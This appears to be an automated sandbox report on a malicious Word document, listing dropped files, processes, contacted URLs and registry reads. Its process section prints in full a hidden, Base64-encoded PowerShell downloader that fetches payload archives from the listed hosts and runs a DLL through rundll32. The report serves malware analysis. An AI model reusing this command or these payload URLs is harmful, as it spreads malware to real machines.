Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Order.802796810.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: bandwidth-monitored
strategize Investment Account Well Small full-range Product, Author: Julie Marty, Template: Normal.dotm, Last Saved By: Lo
Guyot, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 13 12:11:00 2021,
Last Saved Time/Date: Wed Jan 13 12:12:00 2021, Number of Pages: 1, Number of Words: 3127, Number of Characters: 17826, Security:
8
|
initial sample
|
||
C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1A67161-551E-40AF-9919-E039C2A6E74E}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order.802796810.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13
2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 14 09:32:34 2021, length=90624, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RJL0BX05F30CVKZ4577U.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$der.802796810.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://tumkuv.org.tr/zd8dxb2u.zip
|
unknown
|
||
http://mail.kyojinconduits.com
|
unknown
|
||
http://accuratebc.gr/e0lw3t.zip
|
unknown
|
||
http://theworldofjacob.com/cjsomlo.zip
|
unknown
|
||
http://legion.seriesnow.website/q33rv2.zip
|
unknown
|
||
http://e-macom.com.br/cl35e0.zip
|
unknown
|
||
http://mail.kyojinconduits.com/jhgun753.zip
|
198.54.126.36
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
mail.kyojinconduits.com
|
198.54.126.36
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
198.54.126.36
|
unknown
|
United States
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
~ 4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
h 4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
p!4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC65B
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
